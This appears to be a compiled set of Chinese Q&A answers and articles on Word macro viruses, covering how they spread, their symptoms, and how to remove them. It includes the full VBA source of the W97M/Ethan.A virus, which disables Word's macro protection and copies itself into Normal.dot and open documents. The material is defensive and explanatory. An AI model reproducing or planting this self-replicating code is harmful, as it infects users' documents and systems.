宏病毒什么是Word宏病毒，如何清除Word宏病毒

什么是宏病毒？

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会 “感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

来源百科

宏病毒是一个什么样的病毒？

宏病毒 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会 “感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果 WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒（要得到这种保护，需要购买和安装专门的防病毒软件）。

但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。

这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏（例如，单位所用的定货窗体），打开文档时就包含宏。

如果您并不希望在文档中包含宏，或者不了解文档的确切来源。

例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的 节点。

在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择“取消宏”。

OFFICE97软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许“宏病毒保护”复选框。

如果愿意，您可以终止系统对文档宏病毒的检查。

当Word显示宏病毒警告信息时，清除“在打开带有宏或自定义内容的文档时提问”复选框。

或者关闭宏检查：单击“工具”菜单中的“选项”命令，再单击“常规”选项卡，然后清除“宏病毒保护”复选框。

不过我强烈建议您不要取消宏病毒防护功能，否则您会失去这道防护宏病毒的天然屏障。

二、宏病毒的判断方法 虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒： 1、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会会弹出相应的警告框。

而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那么您可以完全肯定您的文档已经感染了宏病毒。

2、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。

由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。

3、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。

WORD97中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。

但有些宏病毒为了对付OFFICE97中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出 OFFICE时自动屏蔽掉宏病毒防护选项。

因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。

也就是说一系列WORD模板、特别是normal.dot 已经被感染。

鉴于绝大多数人都不需要或着不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。

注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！ 三、宏病毒的防治和清除 1、首选方法：用最新版的反病毒软件清除宏病毒。

使用反病毒软件是一种高效、安全和方便的清除方法，也是一般计算机用户的首选方法。

但是宏病毒并不象某些厂商或麻痹大意的人那样认为的有所谓“广谱”的查杀软件，这方面的突出例子就是ETHAN宏病毒。

ETHAN宏病毒相当隐蔽，比如您使用KV300 Z+、RAV V9.0(11)、 KILL 85.03等反病毒软件（应该算比较新的版本了）都无法查出它。

此外这个宏病毒能够悄悄取消WORD中宏病毒防护选项，并且某些情况下会把被感染的文档置为只读属性，从而更好地保存了自己。

因此，对付宏病毒应该和对付其它种类的病毒一样，也要尽量使用最新版的查杀病毒软件。

无论你使用的是何种反病毒软件，及时升级是非常重要的。

比如虽然KV300 Z+版不能查杀ETHAN宏病毒，但最新推出的KV300 Z++已经可以查杀它。

2、应急处理方法：用写字板或WORD 6.0文档作为清除宏病毒的桥梁。

如果您的WORD系统没有感染宏病毒，但需要打开某个外来的、已查出感染有宏病毒的文档，而手头现有的反病毒软件又无法查杀它们，那么您可以试验用下面的方法来查杀文档中的宏病毒：打开这个包含了宏病毒的文档（当然是启用WORD中的“宏病毒防护”功能并在宏警告出现时选择“取消宏”），然后在“文件”菜单中选择“另存为”，将此文档改存成写字板（RTF）格式或WORD6.0格式。

在上述方法中，存成写字板格式是利用RTF文档格式没有宏，存成 WORD 6.0格式则是利用了WORD97文档在转换成WORD6.0格式时会失去宏的特点。

写字板所用的rtf格式适用于文档中的内容限于文字和图片的情况下，如果文档内容中除了文字、图片外还有图形或表格，那么按 WORD6.0格式保存一般不会失去这些内容。

存盘后应该检查一下文档的完整性，如果文档内容没有任何丢失，并且在重新打开此文档时不再出现宏警告则大功告成。

宏病毒是什么原理 怎么避免中宏病毒

宏病毒的原理楼上的已经回答的非常明白了，简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！ 您可以在360杀毒【设置】的【病毒扫描设置】里把【需要扫描的文件类型】改成【扫描所有文件】，更新到最新病毒库，然后进行全盘扫描，就可以了。

宏病毒是什么,在电子表格中怎么样清除??

宏是Word 里一个非常有用的工具，但也是Word 的安全漏洞之一。

有一些恶意的人利用宏制造宏病毒，给别人带来麻烦。

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，宏病毒就会被激活，转移到计算机上，并驻留在 Normal 模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

1 宏病毒 宏病毒已经成为发展最快和传播最迅速的病毒。

美国国际计算机安全协会ICSA 的《ICSA 1998 病毒流行调查报告》表明宏病毒独占 1998 年十大病毒感染事件的72%，在十大病毒中占了五席交椅： WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。

根据 DataFellow 公司每天特征码升级的F-Macro 所检测到的宏病毒数目，至1998 年12 月达到了3,332 个，而在1997 年12 月才是1,821 个，增长率为83.0%。

而且F-Macro 并不能检测到所有宏病毒。

在1998 年12 月出现了Word Class Object 的宏病毒，是由VicodinES 编写的。

1.1 宏病毒 许多应用程序都允许在用户的数据库中包含一些宏，随着应用软件的进步，宏语言的功能也越来越强大，其中微软的Word Visual Basic for Application（VBA）已经成为应用软件宏语言的标准。

利用宏语言，可以实现几乎所有的操作，还可以实现一些应用软件原来没有的功能。

每个模板或数据文件中，都可以包含宏命令。

有不少应用软件允许用户利用宏修改软件菜单的功能，并可以将某一个宏加入到菜单中或设置成自动运行的命令。

利用这个功能，宏就可以修改软件本身的功能，从而将软件本身修改为病毒传播的源泉。

宏病毒就是利用Word VBA 进行编写的一些宏，这些宏可以自动运行，干扰用户工作，轻则降低工作效率，重则破坏文件，使用户遭受巨大损失。

一旦打开含有宏病毒的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal 模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

宏病毒成为传播最快的病毒，其原因有三个：第一，现在用户几乎对可执行文件病毒和引导区病毒已经有了比较一致的认识，对这些病毒的防治都有一定的经验，许多公司、企业对可执行文件和磁盘的交换都有严格的规定。

但对宏病毒的危害还没有足够的认识，而现在主要的工作就是交换数字文件，因此使宏病毒得到迅速传播。

第二，现在的查病毒、防病毒软件主要是针对可执行文件和磁盘引导区设计的，一般都假定数据文件中不会存在病毒，而人们相信查病毒软件的结论，从而使隐藏在数据文件中的病毒成为漏网之鱼。

第三，CD-ROM 和 使病毒的传播速度大大加快。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果Word 系统中的模板包含了宏病毒，我们称Word 系统感染了宏病毒。

Word 2000 无法扫描软盘、硬盘或网络驱动器上的宏病毒（要得到这种保护，需要购买和安装专门的防病毒软件）。

但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。

这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏（例如，单位所用的定货窗体），打开文档时就包含宏。

如果您并不希望在文档中包含宏，或者不了解文档的确切来源。

例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的 节点。

在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择【取消宏】。

Word 软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许【宏病毒保护】复选框。

如果愿意，可以终止系统对文档宏病毒的检查。

当Word 显示宏病毒警告信息时，清除【在打开带有宏或自定义内容的文档时提问】复选框。

或者关闭宏检查：单击【工具】菜单中的【宏】命令，再从级联菜单中选择【安全性】命令，出现【安全性】对话框，选择【安全级】选项卡，将安全级别设为【无】。

不过一般建议用户不要取消宏病毒防护功能，否则会失去这道防护宏病毒的天然屏障。

1.2 宏病毒示例 为了更好地理解宏病毒， 我们仔细分析一下宏病毒 W97M/Ethan.A。

下面是该病毒的代码。

Private Sub Document_Close（） On Error Resume Next s = ActiveDocument.Saved Application.EnableCancelKey = Not -1 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With Randomize If Dir（"c:ethan.___", 6） = "" Then Open "c:ethan.___" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item （1）.CodeModule.CountOfLines a = MacroContainer.VBProject.VBComponents.Item （1）.CodeModule.Lines（i, 1） Print #1, a Next i Close #1 SetAttr "c:ethan.___", 6 End If If Dir（"c:class.sys"） <>"" Then Kill "c:class.sys" If NormalTemplate.VBProject.VBComponents.Item （ 1 ） .CodeModule.Lines （ 1, 1 ） <>"Private Sub Document_Close（）" Then Set t = NormalTemplate.VBProject.VBComponents.Item（1） ElseIf ActiveDocument.VBProject.VBComponents.Item （ 1 ） .CodeModule.Lines （ 1, 1 ） <>"Private Sub Document_Close（）" Then Set t = ActiveDocument.VBProject.VBComponents.Item（1） Else t = "" End If If t <>"" Then Open "c:ethan.___" For Input As #1 If LOF（1） = 0 Then GoTo q i = 1 Do While Not EOF（1） Line Input #1, a t.CodeModule.InsertLines i, a i = i + 1 Loop q: Close #1 If Rnd < 0.3 Then With Dialogs （ wdDialogFileSummaryInfo ） : .Title = "Ethan Frome": .Author = "EW/LN/CB": .Keywords = "Ethan": .Execute: End With If Left（ActiveDocument.Name, 8） <>"Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If If ActiveDocument.Saved <>s Then ActiveDocument.Saved = s End Sub W97M/Ethan.A 是一种寄生型宏病毒，由一个宏组成，能够感染 Word 系统中的文档和模板。

在感染过程中，W97M/Ethan.A 使用一种特殊的算法，从自己的源文件向宿主文件传送病毒代码，在源文件中存放的是以VBA 代码形式存放的病毒程序。

一旦感染成功，W97M/Ethan.A 会删除自身的有关文件，隐藏踪迹，并将感染所有访问过的Word 文件。

在被感染的Word 文件中，大概有三成几率的文件属性会被病毒更改，其标题会被改为“Ethan Frome”，而作者会被改为“EW/LN/CB”。

如果发现上述特征，则说明此文档已被W97M/Ethan.A 宏病毒感染。

对已感染的文档进行操作，可能会出现以下问题： （1）在存储文档时，无法以Word 文档格式存储，而只能存储为 Word 模板格式。

（2）在打开文档时，Word 系统会向用户询问文档的开启密码，否则无法访问该文件。

（3）在清除了宏病毒之后，仍然看不到Word 系统中的某些命令或选项，它们可能已被宏病毒删除。

消息来源:中国信用财富网

什么是Word宏病毒，如何清除Word宏病毒

这些都是Word中了宏病毒的症状，出现这些问题，需要清楚宏病毒。

一、什么是Word宏病毒：Word宏病毒是用一种专门的Basic语言即Word Basic所编写的程序，与其他计算机病毒一样，它能对用户系统中的可执行文件和数据文本类文件造成破坏。

二、怎样确定是否感染Word宏病毒：其实，如果您的Word出现了上面第一段提到的问题，那么，基本确定是中了宏病毒了。

另外，您也可以打开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，则表示这个文件已经感染了宏病毒。

三、如何删除Word宏病毒：方法一、关闭Word，Ctrl+F，找到Word模板文件NORMAL.DOT，找到后删除并从回收站中彻底删除。

方法二、选择【取消宏】，复制全部文档，并在一新建空文档中粘贴，保存为一个新文件。